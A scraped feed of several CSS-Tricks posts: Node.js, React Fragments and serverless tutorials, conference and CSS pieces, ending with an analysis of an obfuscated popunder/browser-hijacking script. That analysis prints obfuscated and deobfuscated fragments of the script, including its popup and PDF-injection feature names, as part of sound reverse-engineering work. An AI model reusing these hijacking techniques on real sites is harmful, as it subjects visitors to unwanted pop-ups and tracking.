In the next block of code, we are printing to standard output (console.log) to confirm the values that will be used in the process of building the game. The statements that follow are preparing the paths to the relevant files and directories.

The src will point to the template directory. The destination will point to a new directory under releases. The configuration file that will have its values updated will reside under this new game directory we are creating. And finally, to preview our new game, we construct the URL using the path to the local server we booted up earlier on.

console.log(`Creating a new reskin '${gameName}' with skin color: Primary: '${gamePrimaryColor}' Secondary: '${gameSecondaryColor}'`); const src = path.join(__dirname, 'template'); const destination = path.join(__dirname, 'releases', gameName); const configurationFilePath = path.join(destination, GAME_JSON_FILENAME); const projectToOpen = path.join('http://localhost:8080', 'releases', gameName, 'index.html');

In the code following this explanation, we:

  • Copy the template files to the releases directory.
  • After this is created, we read the JSON of the original template values.
  • With the new configuration object, we override the existing primary and secondary colors provided by the user’s input.
  • We rewrite the JSON file so it has the new values.
  • When the JSON file has been updated, we ask the user if they would like to open the new game in a browser.
  • If anything went wrong, we catch the error and log it out.
fse.copy(src, destination) .then(() => { console.log(`Successfully created ${destination}`green); return fse.readJson(configurationFilePath); }) .then((config) => { const newConfig = config; newConfig.primaryColor = gamePrimaryColor; newConfig.secondaryColor = gameSecondaryColor; return fse.writeJson(configurationFilePath, newConfig); }) .then(() => { console.log(`Updated configuration file ${configurationFilePath}`green); openGameIfAgreed(projectToOpen); }) .catch(console.error);

Below is the function that gets invoked when the copying has completed. It will then prompt the user to see if they would like to open up the game in the browser. The user responds with y or n

const openGameIfAgreed = (fileToOpen) => { const isOpeningGame = readLineSync.keyInYN('Would you like to open the game? '); if (isOpeningGame) { open(fileToOpen); } };

Let’s see it in action when we don’t pass any arguments. You can see it doesn’t break, and instead prompts the user for the values it needs.

$ node new-reskin.js What is the name of the new reskin? blue-reskin Enter a Hex Code for the game primary color #76cad8 Enter a Hex Code for the game secondary color #10496b Creating a new reskin 'blue-reskin' with skin color: Primary: '#76cad8' Secondary: '#10496b' Successfully created nobot-examples\examples\020\releases\blue-reskin Updated configuration file nobot-examples\examples\020\releases\blue-reskin\game.json Would you like to open the game? [y/n]: y (opens game in browser)

My game opens on my localhost server automatically and the game commences, with the new colors. Sweet!

Oh... I’ve lost a life already. Now if you navigate to the releases directory, you will see a new directory called blue-reskin This contains the values in the JSON file we entered during the script execution.

Below are a few more releases I made by running the same command. You can imagine if you were releasing games that could configure different: images, sounds, labels, content and fonts, you would have a rich library of games based on the same mechanics.

Even better, if the stakeholders and designers had all of this information in a Jira ticket, you could integrate the Jira API into the Node script to inject these values in without the user having to provide any input. Winning!

This is one of many examples that can be found in Automating with Node.js. In this book, we will be looking at a more advanced example using "Rock Paper Scissors" as the basis of a build tool created from scratch.

The post Automate Your Workflow with Node appeared first on CSS-Tricks.

CSS-in-JS: FTW || WTF?

Css Tricks - Tue, 07/17/2018 - 10:39am

I enjoyed Bruce Lawson's talk on this holiest of wars. It's funny and lighthearted while being well researched and fairly portraying the good arguments on both sides.

The post CSS-in-JS: FTW || WTF? appeared first on CSS-Tricks.

Render Children in React Using Fragment or Array Components

Css Tricks - Tue, 07/17/2018 - 3:38am

What comes to your mind when React 16 comes up? Context? Error Boundary? Those are on point. React 16 came with those goodies and much more, but In this post, we'll be looking at the rendering power it also introduced — namely, the ability to render children using Fragments and Array Components.

These are new and really exciting concepts that came out of the React 16 release, so let’s look at them closer and get to know them.


It used to be that React components could only return a single element. If you have ever tried to return more than one element, you know that you’ll will be greeted with this error: Syntax error: Adjacent JSX elements must be wrapped in an enclosing tag. The way out of that is to make use of a wrapper div or span element that acts as the enclosing tag.

So instead of doing this:

class Countries extends React.Component { render() { return ( <li>Canada</li> <li>Australia</li> <li>Norway</li> <li>Mexico</li> ) } }

...you have to add either an ol or ul tag as a wrapper on those list items:

class Countries extends React.Component { render() { return ( <ul> <li>Canada</li> <li>Australia</li> <li>Norway</li> <li>Mexico</li> </ul> ) } }

Most times, this may not be the initial design you had for the application, but you are left with no choice but to compromise on this ground.

React 16 solves this with Fragments. This new features allows you to wrap a list of children without adding an extra node. So, instead of adding an additional element as a wrapper like we did in the last example, we can throw <React.Fragment> in there to do the job:

class Countries extends React.Component { render() { return ( <React.Fragment> <li>Canada</li> <li>Australia</li> <li>Norway</li> <li>Mexico</li> </React.Fragment> ) } }

You may think that doesn’t make much difference. But, imagine a situation where you have a component that lists different items such as fruits and other things. These items are all components, and if you are making use of old React versions, the items in these individual components will have to be wrapped in an enclosing tag. Now, however, you can make use of fragments and do away with that unnecessary markup.

Here’s a sample of what I mean:

class Items extends React.Component { render() { return ( <React.Fragment> <Fruit /> <Beverages /> <Drinks /> </React.Fragment> ) } }

We have three child components inside of the fragment and can now create a component for the container that wraps it. This is much more in line with being able to create components out of everything and being able to compile code with less cruft.

Fragment Shorthand

There is a shorthand syntax when working with Fragments, which you can use. Staying true to its fragment nature, the syntax is like a fragment itself, leaving only only empty brackets behind.

Going back to our last example:

class Fruit extends React.Component { render() { return ( <> <li>Apple</li> <li>Orange</li> <li>Blueberry</li> <li>Cherry</li> </> ) } } Question: Is a fragment better than a container div?

You may be looking for a good reason to use Fragments instead of the container div you have always been using. Dan Abramov answered the question on StackOverflow. To summarize:

  1. It’s a tiny bit faster and has less memory usage (no need to create an extra DOM node). This only has a real benefit on very large and/or deep trees, but application performance often suffers from death by a thousand cuts. This is one less cut.
  2. Some CSS mechanisms like flexbox and grid have a special parent-child relationship, and adding divs in the middle makes it harder to maintain the design while extracting logical components.
  3. The DOM inspector is less cluttered.
Keys in Fragments

When mapping a list of items, you still need to make use of keys the same way as before. For example, let's say we want to pass a list of items as props from a parent component to a child component. In the child component, we want to map through the list of items we have and output each item as a separate entity. Here’s how that looks:

const preload = { "data" : [ { "name": "Reactjs", "url": "https://reactjs.org", "description": "A JavaScript library for building user interfaces", }, { "name": "Vuejs", "url": "https://vuejs.org", "description": "The Progressive JavaScript Framework", }, { "name": "Emberjs", "url": "https://www.emberjs.com", "description": "Ember.js is an open-source JavaScript web framework, based on the Model–view–viewmodel pattern" } ] } const Frameworks = (props) => { return ( <React.Fragment> {props.items.data.map(item => ( <React.Fragment key={item.id}> <h2>{item.name}</h2> <p>{item.url}</p> <p>{item.description}</p> </React.Fragment> ))} </React.Fragment> ) } const App = () => { return ( <Frameworks items={preload} /> ) }

See the Pen React Fragment Pen by Kingsley Silas Chijioke (@kinsomicrote) on CodePen.

You can see that now, in this case, we are not making use of any divs in the Frameworks component. That’s the key difference!

Render Children Using an Array of Components

The second specific thing that came out of React 16 we want to look at is the ability to render multiple children using an array of components. This is a clear timesaver because it allows us to cram as many into a render instead of having to do it one-by-one.

Here is an example:

class Frameworks extends React.Component { render () { return ( [ <p>JavaScript:</p> <li>React</li>, <li>Vuejs</li>, <li>Angular</li> ] ) } }

You can also do the same with a stateless functional component:

const Frontend = () => { return [ <h3>Front-End:</h3>, <li>Reactjs</li>, <li>Vuejs</li> ] } const Backend = () => { return [ <h3>Back-End:</h3>, <li>Express</li>, <li>Restify</li> ] } const App = () => { return [ <h2>JavaScript Tools</h2>, <Frontend />, <Backend /> ] }

See the Pen React Fragment 2 Pen by Kingsley Silas Chijioke (@kinsomicrote) on CodePen.


Like the Context API and Error Boundary feature that were introduced in React 16, rendering children components with Fragment and multiples of them with Array Components are two more awesome features you can start making use of as you build your application.

Have you started using these in a project? Let me know how in the comments so we can compare notes. &#x1f642;

The post Render Children in React Using Fragment or Array Components appeared first on CSS-Tricks.

PSA: Yes, Serverless Still Involves Servers.

Css Tricks - Mon, 07/16/2018 - 10:00am

You clever dog. You've rooted it out! It turns out when you build things with serverless technology you're still using servers. Pardon the patronizing tone there, I've seen one-too-many hot takes at this point where someone points this fact out and trots away triumphantly.

And yes, because serverless still involves servers, the term might be a bit disingenuous to some. You could be forgiven for thinking that serverless meant technologies like web workers, which use the client to do things you might have otherwise done on a server and is where the term serverless was headed. Alas, it is not.

What serverless really means:

  • Using other people's servers instead of running your own. You're probably already doing that, but serverless takes it to another level where you have no control over the server outside of telling it to run a bit of code.
  • You don't need to think about scaling — that's the serverless provider's problem.
  • You are only paying per execution of your code and not some fixed cost per time.
  • You only worry about your code being misused, but not the security of the server itself.
  • We're mostly talking about Cloud Functions above, but I'd argue the serverless movement involves anything that allows you to work from static hosting and leverage services to help you with functionality. For example, even putting a Google Form on a static site is within the serverless spirit.

Serverless is about outsourcing a little bit more of your project to companies that are incentivized to do it well. My hope is that someday we can have a conversation about serverless without having to tread this ground every time and spat about the term. I suspect we will. I think we're almost over the term the cloud as an industry and we'll jump this hurdle too. It's worth it when a single word successfully evokes a whole ecosystem.

Wanna know more about serverless? Here's the tag on CSS-Trick where we've talked about it a bunch.

The post PSA: Yes, Serverless Still Involves Servers. appeared first on CSS-Tricks.

Create your own Serverless API

Css Tricks - Mon, 07/16/2018 - 3:55am

If you don’t already know of it, Todd Motto has this great list of public APIs. It’s awesome if you’re trying out a new framework or new layout pattern and want to hit the ground running without fussing with the content.

But what if you want or need to make your own API? Serverless can help create a nice one for data you’d like to expose for use.

Serverless really shines for this use case, and hopefully this post makes it clear why. In a non-serverless paradigm, we have to pick something like express, we have to set up endpoints, we have to give your web server secured access to your database server, you have to deploy it, etc. In contrast, here we'll be able to create an API in a few button clicks, with minor modifications.

Here’s the inspiration for this tutorial: I've been building a finder to search for new cocktails and grab random one. I originally started using ae public API but realized quickly that I found the contents limiting and wanted to shape my own.

Your browser does not support the video tag.

I’m going to use Azure for these examples but it is possible to accomplish what we're doing here with other cloud providers as well.

Make the Function

To get started, if you haven't already, create a free Azure trial account. Then go to the portal: preview.portal.azure.com.

Next, we'll hit the plus sign at the top left and select Serverless Function App from the list. We can then fill in the new name of our function and some options. It will pick up our resource group, subscription, and create a storage account from defaults. It will also use the location data from the resource group. So, happily, it's pretty easy to populate the data.

Next, we'll create a new function using HTTP Trigger, and go to the Integrate tab to perform some actions:

Your browser does not support the video tag.

What we did was:

  • Give the route template a name
  • Change the authorization level to "Anonymous"
  • Change the allowed HTTP methods to "Selected Method"
  • Select "GET" for the selected method and unchecked everything else

Now, if we get the function URL from the top right of our function, we'll get this:


The initial boilerplate testing code that we're given is:

module.exports = function (context, req) { context.log('JavaScript HTTP trigger function processed a request.'); if (req.query.name || (req.body && req.body.name)) { context.res = { // status: 200, /* Defaults to 200 */ body: "Hello " + (req.query.name || req.body.name) }; } else { context.res = { status: 400, body: "Please pass a name on the query string or in the request body" }; } context.done(); };

Now if we go to the URL below, we’ll see this:


There’s more information in this blog post, including API unification with Function Proxies. You can also use custom domains, not covered here.

OK, now that that initial part is all set up, let’s find a place to host our data.

Storing the data with CosmosDB

There are a number of ways to store the data for our function. I wanted to use Cosmos because it has one-click integration, making for a pretty low-friction choice. Get a free account here. Once you're in the portal, we'll go to the plus sign in the top left to create a new service and this time select "CosmosDB." In this case, we chose the SQL version.

We have a few options for how to create our documents in the database. We're merely making a small example for demo purposes, so we can manually create them by going to Data Explorer in the sidebar. In there, I made a database called CocktailFinder, a collection called Cocktails, and added each document. For our Partition Key, we'll use /id.

In real practice, you’d probably either want to upload a JSON file by clicking the "Upload JSON" button or follow this article for how to create the files with the CLI.

We can add something in JSON format like this:

{ "id": "1", "drink": "gin_and_tonic", "ingredients": [ "2 ounces gin", "2 lime wedges", "3–4 ounces tonic water" ], "directions": "Add gin to a highball glass filled with ice. Squeeze in lime wedges to taste, then add them to glass. Add tonic water; stir to combine.", "glass": [ "highball", "hurricane" ], "image": "https://images.unsplash.com/photo-1523905491727-d82018a34d75?ixlib=rb-0.3.5&ixid=eyJhcHBfaWQiOjEyMDd9&s=52731e6d008be93fda7f5af1145eac12&auto=format&fit=crop&w=750&q=80" }

And here is the example with all three that we’ve created, and what Cosmos adds in:

Your browser does not support the video tag.

Have the function surface the data

OK, now we’ve got some dummy data to work with, so let’s connect it to our serverless function so we can finish up our API!

If we go back to our function in the portal and click Integrate in the sidebar again, there’s a middle column that called Inputs. Here, we can click on the plus that says "+ New Inputs" and a few options come up. We’ll click the CosmosDB option and "Create."

A prompt will come up that asks us to provide information about our Database and Collection. If you recall, the databaseName was CocktailFinder and the collectionName was Cocktails. We also want to use the same partitionKey which was /id. We’ll use all the other defaults.

Now if we go to our function.jso, you can see that it’s now been updated with:

{ "type": "documentDB", "name": "inputDocument", "databaseName": "CocktailFinder", "collectionName": "Cocktails", "partitionKey": "/id", "connection": "sdrassample_DOCUMENTDB", "direction": "in" }

We’re going to use that inputDocument to update our testing function to reflect that’s what we’re trying to access. I also add in the status and log frequently, but that’s optional.

module.exports = function (context, req) { context.log('JavaScript HTTP trigger function processed a request.'); if (context.bindings) { context.log('Get ready'); context.res = {status: 200, body: context.bindings.inputDocument}; context.log(context.res); } else { context.res = { status: 400, body: "Something went wrong" }; } context.done(); };

Now you can see our function at work!

Your browser does not support the video tag.


Can’t forget the CORS. Back in the portal, we’ll click on the function name and click on Platform Features. CORS is listed under the API heading.

We can add any of the allowed origins here. Remember, this includes localhost.

Serve it up!

Now to make sure the API is working and we can access it's data from an application, we’ll use an axios call. I have a really barebones CodePen implementation so that you can see how that might work. In Vue, we’re hooking into the created lifecycle method and making the GET request, in order to output the JSON data to the page.

See the Pen Show API Output, beginning of Vue.js integration by Sarah Drasner (@sdras) on CodePen.

From here, you have all that data to play with, and you can store whatever you like in whatever form you fancy. You can use something like Vue, React, or Angular to create interfaces with the content we stored in our database, and our serverless function creates the API for us. The sky is the limit to what we can create! &#x1f389;

The post Create your own Serverless API appeared first on CSS-Tricks.

Remote Conferences; Bridging the Gap, Clearing the Odds

Css Tricks - Mon, 07/16/2018 - 2:31am

A few weeks back, I saw one of my esteemed mentors decry the psychological traumas he had experienced, following series and series of refusals at certain embassies.

“A child concentrating hard at school” by Les Anderson on Unsplash

You would think he went for a contract he did not have the capacity for, but then, you would have been wrong. He needed to impart knowledge. He opted to do so across borders, but then, some realities were harsh.

We are fighting just the police for mistaking techies and related careers as fraudsters when we have a much bigger problem #thread

— Christian Nwamba (@codebeast) June 3, 2018

Borders and geographical constraints can cause a lot of havoc. However, it can only do so, when the full discovery of a better way to impart knowledge across borders has not been made. Video conferencing technology has become handy at times like this. Hence, your traditional seminars, conferences, and talks can easily be achieved from anywhere, regardless of your role.

Photo by DESIGNECOLOGIST on Unsplash
On a lighter note, these pillows are dope.

Maybe we should not be too ambitious. Maybe we could simply make this article about a one-sided ‘remoteness’, where the attendees are gathered in an offline venue, but then the speakers have a 100% flexibility to speak from anywhere.

For this kind of arrangement, the advantages are many, same as the disadvantages. Let's start with the disadvantages. For a place not having a very fast internet, the video and audio quality might be abysmal. But that is about that!

For the advantages: a herd of developers or writers are gathered, waiting for a speaker to impart knowledge. So many things would have gone wrong if the speaker was to travel from one location to another. Think about the racism, the mishaps or the thefts. What about the man-hours lost in commuting from one place to the other?

All of these are greatly minimized to a lazy trudge from your bed or kitchen to your computer. Then, the speaker has 5 minutes to the conference, and they are washing their face and checking their teeth. Now he or she is out of time and rushes up with a neatly ironed shirt, on a light brown underpants. Of course, the camera is only built to see the face of the speaker. Convenience is the word!

Visa problems are a thing here in Africa. While a public ban has not been laid on some countries, a lot of resource persons find it difficult to get visa to speak in countries they have a large following, or not.

Photo by Bruno Aguirre on Unsplash

However, this conferencing arrangement might make your dream come true, if and only if you are able to get up from that cozy bed and turn on your computer in time. You could reach more audience than you expect.

Such an easy life.

For the attendees, it is a Win. Look at it this way; your favorite speakers are just a click away from you! That sounds alluring. There are plenty reasons why your favorite speakers might not make it to you in a totally offline conference, but then everything has been simplified and he or she is simply a button and a good internet-connection away. This offers more mentorship chances and enhances progress. In sum, it makes things easier for your favorite speakers.

Photo by Headway on Unsplash

Are you a writer, a developer or a random conference crasher, then you should look out for the next online conference in town. You might just be surprised at the quality of speakers you would be hearing from.

Concatenate is a free conference for Nigerian developers, happening the 9th and 10th of August. The attendees will be in person and the speakers and MC will be both in person and remote from around the world. If you're near Lagos, register here!

The post Remote Conferences; Bridging the Gap, Clearing the Odds appeared first on CSS-Tricks.

The div that looks different in every browser

Css Tricks - Fri, 07/13/2018 - 11:14am

It's not that Martijn Cuppens used User Agent sniffing, CSS hacks, or anything like that to make this quirk div. This is just a plain ol' <div> using the outline property a la:

div { outline: inset 100px green; outline-offset: -125px; }

It looks different in different browsers because browsers literally render something differently in this strange situation.

I happened upon Reddit user spidermonk33's comment in which they animated the offset to understand it a bit more. I took that idea and made this little video to show them behaving even weirder than the snapshots...

Direct Link to ArticlePermalink

The post The div that looks different in every browser appeared first on CSS-Tricks.

Scrolling Gradient

Css Tricks - Fri, 07/13/2018 - 11:13am

If you want a gradient that changes as you scroll down a very long page, you can create a gradient with a bunch of color stops, apply it to the body and it will do just that.

But, what if you don't want a perfectly vertical gradient? Like you want just the top left corner to change color? Mike Riethmuller, re-using his own technique from the CSS-only scroll indicator (A-grade CSS trickery), did this by overlapping two gradients. The "top" one is fixed position and sort of leaves a hole that another taller gradient peeks through from below on scroll.

Direct Link to ArticlePermalink

The post Scrolling Gradient appeared first on CSS-Tricks.

Anatomy of a malicious script: how a website can take over your browser

Css Tricks - Fri, 07/13/2018 - 3:52am

By now, we all know that the major tech behemoths like Facebook or Google know everything about our lives, including how often we go to the bathroom (hence all the prostate medication ads that keep popping up, even on reputable news sites). After all, we’ve given them permission to do so, by reading pages and pages of legalese in their T&C pages (we all did, didn’t we?) and clicking on the "Accept" button.

But what can a site do to you, or to your device, without your explicit consent? What happens when you visit a slightly "improper" site, or a "proper" site you visited includes some third-party script that hasn’t been thoroughly checked?

Has it ever happened to you that your browser gets hijacked and innumerable pop-ups come up, and you seem to be unable to close them without quitting the browser altogether, or clicking 25 times on the "Back" button? You do feel in danger when that happens, don’t you?

Following input from Chris here at CSS-Tricks, I decided to look for a script that does exactly that, and see what happens under the hood. It looked like a fairly daunting task, but I’ve learned quite a few things from it, and in the end had a lot of fun doing it. I hope I can share some of the fun with you.

The hunt for the script

The idea was to look for, to quote Chris, "bits of JavaScript that do surprisingly scary things."

The first thing I did was to set up a Virtual Machine with Virtual Box on my main Ubuntu development PC. This way, if the sites I visited and the scripts contained therein tried to do something scary to my computer, I would just need to erase the VM without compromising my precious laptop. I installed the latest version of Ubuntu on the VM, opened the browser and went hunting.

One of the things I was looking for was uses of a variation of the infamous Evercookie (aka "undeletable cookie") which would be a clear sign of shady tracking techniques.

Where to look for such a script? I tried to find one of the aforementioned intrusive ads on legitimate websites, but couldn’t find any. It seems that companies supplying ads have become much better in spotting suspicious scripts by automating the vetting process, I assume.

I tried some reputable news sites, to see if there was anything interesting, but all I found were tons and tons of standard tracking scripts (and JavaScript errors in the console logs). In these cases, most of what the scripts do is send data to a server, and since you have little way of knowing what the server’s actually doing with the data, it would have been very difficult to dissect them.

I then thought that the best place to look for "scary" stuff would be sites whose owners won’t risk a legal action if they do something "scary" to their users. Which means, basically, sites where the user is trying to do something bordering on the illegal to begin with.

I looked at some Pirate Bay proxies, with no luck. Then I decided to move over to sites offering links to illegal streaming of sporting events. I went through a couple of sites, looking carefully at the scripts they included with Chromium’s DevTools.

On a site offering, amongst others, illegal streaming of table tennis matches, I noticed (in the list of JavaScripts in the DevTools Network tab) amongst third-party libraries, standard UI scripts and the all-too-frequent duplicate inclusion of the Google Analytics library (ouch!), a strangely named script with no .js extension and just a number as an URL.

Our suspect, spotted in the Network tab.

I had a look at the seemingly infinite couple of lines of obfuscated code that constituted most of the script’s code, and found strings like chromePDFPopunderNew, adblockPopup, flashFileUrl, escaped <script>tags, and even a string containing an inline PDF. This looked like interesting stuff. The hunt was over! I downloaded the script to my computer, and started trying to make some sense of it.

I am not explicitly disclosing the domains involved in this operation, since we’re interested in the sin here, not the sinner. However, I’ve deliberately left a way of determining at least the main URL the script is sending users to. If you manage to solve the riddle, send me a private message, and I’ll tell you if you guessed right!

The script: deobfuscating and figuring out the configuration parameters What the script looks like

The script is obfuscated, both for security purposes and to ensure a faster download. It is made of a big IIFE (Immediately-invoked function expression), which is a technique used to isolate a piece of JavaScript code from its surroundings. Context doesn’t get mixed up with other scripts, and there is no risk of namespace conflict between function or variable names in different scripts.

Here’s the beginning of the script. Note the beginning of the base64-encoded PDF on the last line:

And here’s the end of it:

The only action carried out in the global context, apparently, is to set the global variable zfgloadedpopupto true, presumably to tell other scripts belonging to the same "family" that this one has already been loaded. This variable is used only once, so the script itself does not check if it has loaded. So, if the site you’re visiting includes it twice by mistake, you’ll get double the pop-ups at the same price. Lucky!

The big IFEE expects two parameters, called options and lary. I actually checked the name of the second parameter to see what it might mean, and the only meaning I found was "aggressive, antisocial" in British slang. "So, we’re being aggressive here," I thought. "Interesting."

Theoptions parameter is clearly an object with keys and values, even though they’re totally unintelligible. The lary parameter is a string of some sort. To make sense of this, the only option was to deobfuscate the whole script. Keep reading, and everything will be explained.

Deobfuscating the script

I first tried to resort to existing tools, but none of the online tools available seemed to be doing what I expected them to do. Most of what they did was pretty-printing the code, which my IDE can do quite easily by itself. I read about JSDetox, which is actual computer software and should be very helpful to debug this kind of script. However, I tried to install it into two different versions of Ubuntu and ended up in Ruby GEM dependency hell in both cases. JSDetox is fairly old, and I guess it’s practically abandonware now. The only option left was to go through things mostly by hand or via manual or semi-automated Regular Expression substitutions. I had to go through several steps to fully decipher the script.

Here is an animated GIF showing the same code section at various stages of deciphering:

The transformation from unreadable gibberish to intelligible code.

The first step was quite straightforward: it required reformatting the code of the script, to add spacing and line breaks. I was left with properly indented code, but it was still full of very unreadable stuff, like the following:

var w6D0 = window; for (var Z0 in w6D0) { if (Z0.length === ((129.70E1, 0x1D2) < 1.237E3 ? (47, 9) : (0x1CE, 1.025E3) < (3.570E2, 122.) ? (12.9E1, true) : (5E0, 99.) > 0x247 ? true : (120.7E1, 0x190)) && Z0.charCodeAt((0x19D > (0x199, 1.5E1) ? (88., 6) : (57., 0x1D9))) === (121.30E1 > (1.23E2, 42) ? (45.2E1, 116) : (129., 85) > (87., 5.7E2) ? (45.1E1, 0x4) : (103., 0x146) >= (0x17D, 6.19E2) ? (1.244E3, 80) : (1.295E3, 149.)) && Z0.charCodeAt(((1.217E3, 90.10E1) <= (0xC2, 128.) ? (66, 'sw') : (0x25, 0xAB) > 1.26E2 ? (134, 8) : (2.59E2, 0x12) > 0xA9 ? 'sw' : (0x202, 0x20F))) === ((95, 15) <= 63 ? (0x10B, 114) : (0xBB, 8.72E2) <= (62, 51.) ? 'r' : (25, 70.) >= (110.4E1, 0x8D) ? (121, 72) : (42, 11)) && Z0.charCodeAt(((96.80E1, 4.7E1) >= 62. ? (25.70E1, 46) : 0x13D < (1.73E2, 133.1E1) ? (0x1A4, 4) : (28, 0x1EE) <= 36.30E1 ? 37 : (14.61E2, 0x152))) === (81. > (0x1FA, 34) ? (146, 103) : (0x8A, 61)) && Z0.charCodeAt(((92.60E1, 137.6E1) > (0x8, 0x3F) ? (123., 0) : (1.41E2, 12.11E2))) === ((0xA, 0x80) > (19, 2.17E2) ? '' : (52, 0x140) > (80., 0x8E) ? (42, 110) : 83.2E1 <= (0x69, 0x166) ? (41., 'G') : (6.57E2, 1.093E3))) break } ;

What is this code doing? The only solution was to try and execute the code in a console and see what happened. As it turns out, this code loops through all ofwindow’s properties and breaks out of the loop when that very complicated condition makes a match. The end result is sort of funny because all the code above does is the following:

var Z0 = 'navigator'

…that is, saving the navigator property of window to a variable called Z0. This is indeed a lot of effort just to assign a variable! There were several variables obfuscated like this, and after a few rounds of execution in the console, I managed to obtain the following global variables:

var Z0 = 'navigator'; var Q0 = 'history'; var h0 = 'window'; // see comment below /* Window has already been declared as w6D0. This is used to call the Window object of a variable containing a reference to a different window, other than the current one */

The same could be applied to several other global variables declared at the beginning of the script. This whole shenanigan seemed a bit silly to me, since many other variables in the script are declared more openly a few lines later, like these:

var m7W = {'K2': 'documentElement', 'W0': 'navigator', 'A2': 'userAgent', 'o2': 'document'};

But never mind. After this procedure, I was left with a series of variables that are global to the script and are used all over it.

Time for some mass substitutions. I substituted the w6D0variable with window everywhere then proceeded with the other global variables.

Remember the variable h0 above? It’s everywhere, used in statements like the following:

if (typeof w6D0[h0][H8] == M3) {

...which, after substitution, became:

if (typeof window['window'][H8] == M3) {

This is not much clearer than before, but still is a small step ahead from where I started. Similarly, the following line:

var p = w6D0[X0][H](d3);

...became this:

var p = window["document"][H](d3);

In the obfuscation technique used for this script, the names of variables that are local to a function are usually substituted with names with a single letter, like this:

function D9(O, i, p, h, j) { var Q = 'newWin.opener = null;', Z = 'window.parent = null;', u = ' = newWin;', N = 'window.parent.', w = '' + atob('Ig==') + ');', g = '' + atob('Ig==') + ', ' + atob('Ig==') + '', f = 'var newWin = window.open(' + atob('Ig==') + '', d = 'window.frameElement = null;', k = 'window.top = null;', r = 'text', l = 'newWin_', F = 'contentWindow', O9 = 'new_popup_window_', I = 'disableSafeOpen', i9 = e['indexOf']('MSIE') !== -'1'; // more function code here }

Most global variables names, however, have been substituted with names with multiple letters, and all these names are unique. This means that it was possible for me to substitute them globally all over the script.

There was another big bunch of global variables:

var W8 = 'plugins', f7 = 'startTimeout', z1 = 'attachEvent', b7 = 'mousemove', M1 = 'noScrollPlease', w7 = 'isOnclickDisabledInKnownWebView', a1 = 'notificationsUrl', g7 = 'notificationEnable', m8 = 'sliderUrl', T8 = 'interstitialUrl', v7 = '__interstitialInited', C8 = '%22%3E%3C%2Fscript%3E', O8 = '%3Cscript%20defer%20async%20src%3D%22', i8 = 'loading', p8 = 'readyState', y7 = '__pushupInited', o8 = 'pushupUrl', G7 = 'mahClicks', x7 = 'onClickTrigger', J7 = 'p', r7 = 'ppu_overlay', d7 = 'PPFLSH', I1 = 'function', H7 = 'clicksSinceLastPpu', k7 = 'clicksSinceSessionStart', s7 = 'lastPpu', l7 = 'ppuCount', t7 = 'seriesStart', e7 = 2592000000, z7 = 'call', Y1 = '__test', M7 = 'hostname', F1 = 'host', a7 = '__PPU_SESSION_ON_DOMAIN', I7 = 'pathname', Y7 = '__PPU_SESSION', F7 = 'pomc', V7 = 'ActiveXObject', q7 = 'ActiveXObject', c7 = 'iOSClickFix', m7 = 10802, D8 = 'screen', // ... and many more

I substituted all of those as well, with an automated script, and many of the functions became more intelligible. Some even became perfectly understandable without further work. A function, for example, went from this:

function a3() { var W = E; if (typeof window['window'][H8] == M3) { W = window['window'][H8]; } else { if (window["document"][m7W.K2] && window["document"][m7W.K2][q5]) { W = window["document"][m7W.K2][q5]; } else { if (window["document"][z] && window["document"][z][q5]) { W = window["document"][z][q5]; } } } return W; }

...to this:

function a3() { var W = 0; if (typeof window['window']['innerWidth'] == 'number') { W = window['window']['innerWidth']; } else { if (window["document"]['documentElement'] && window["document"]['documentElement']['clientWidth']) { W = window["document"]['documentElement']['clientWidth']; } else { if (window["document"]['body'] && window["document"]['body']['clientWidth']) { W = window["document"]['body']['clientWidth']; } } } return W; }

As you can see, this function tries to determine the width of the client window, using all available cross-browser options. This might seem a bit overkill, since window.innerWidth is supported by all browsers starting from IE9.

window.document.documentElement.clientWidth, however, works even in IE6; this shows us that our script tries to be as cross-browser compatible as it can be. We’ll see more about this later.

Notice how, to encrypt all of the property and function names used, this script makes heavy use of bracket notation, for example:


...instead of:


This allows the script to substitute the name of object methods and properties with random strings, which are then defined once — at the beginning of the script — with the proper method or property name. This makes the code very difficult to read, since you have to reverse all of the substitutions. It is obviously not only an obfuscation technique, however, since substituting long property names with one or two letters, if they occur often, can save quite a few bytes on the overall file size of the script and thus make it download faster.

The end result of the last series of substitutions I performed made the code even clearer, but I was still left with a very long script with a lot of functions with unintelligible names, like this one:

function k9(W, O) { var i = 0, p = [], h; while (i < W.length) { h = O(W[i], i, W); if (h !== undefined) { p['push'](h); } i += '1'; } return p; }

All of them have variable declarations at the beginning of each function, most likely the result of the obfuscation/compression technique used on the original code. It is also possible that the writer(s) of this code were very scrupulous and declared all variables at the beginning of each function, but I have some doubts about that.

The k9 function above is used diffusely in the script, so it was among the first I had to tackle. It expects two arguments, W and O and prepares a return variable (p) initialized as an empty array as well as a temporary variable (h).

Then it cycles throughW with a while loop:

while (i < W.length) {

This tells us that the W argument will be an array, or at least something traversable like an object or a string. It then supplies the current element in the loop, the current index of the loop, and the whole W argument as parameters to the initialO argument, which tells us the latter will be a function of some sort. It stores the result of the function’s execution in the temporary variableh:

h = O(W[i], i, W);

If the result of this function is not undefined, it gets appended to the result array p:

if (h !== undefined) { p['push'](h); }

The returned variable is p.

What kind of construct is this? It’s obviously a mapping/filter function but is not just mapping the initial object W, since it does not return all of its values, but rather selects some of them. It is also not only filtering them, because it does not simply check for true or false and return the original element. It is sort of a hybrid of both.

I had to rename this function, just like I did with most of the others, giving a name that was easy to understand and explained the purpose of the function.

Since this function is usually used in the script to transform the original object W in one way or another, I decided to rename it mapByFunction. Here it is, in its un-obfuscated glory:

function mapByFunction(myObject, mappingFunction) { var i = 0, result = [], h; while (i < myObject.length) { h = mappingFunction(myObject[i], i, myObject); if (h !== undefined) { result['push'](h); } i += 1; } return result; }

A similar procedure had to be applied to all of the functions in the script, trying to guess one by one what they were trying to achieve, what variables were passed to them and what they were returning. In many cases, this involved going back and forth in the code when one function I was deciphering was using another function I hadn’t deciphered yet.

Some other functions were nested inside others, because they were used only in the context of the enclosing function, or because they were part of some third-party piece of code that had been pasted verbatim within the script.
At the end of all this tedious work, I had a big script full of fairly intelligible functions, all with nice descriptive (albeit very long) names.

Here are some of the names, from the Structure panel of my IDE:

List of deciphered functions with descriptive names.

Now that the functions have names, you can start guessing a few of the things this script is doing. Would any of you like to try to injectPDFAndDoStuffDependingOnChromeVersion in someone’s browser now?

Structure of the script

Once the individual functions comprising the script had been deciphered, I tried to make a sense of the whole.

The script at the beginning is made out of a lot of helper functions, which often call other functions, and sometimes set variables in the global scope (yuck!). Then the main logic of the script begins, around line 1,680 of my un-obfuscated version.

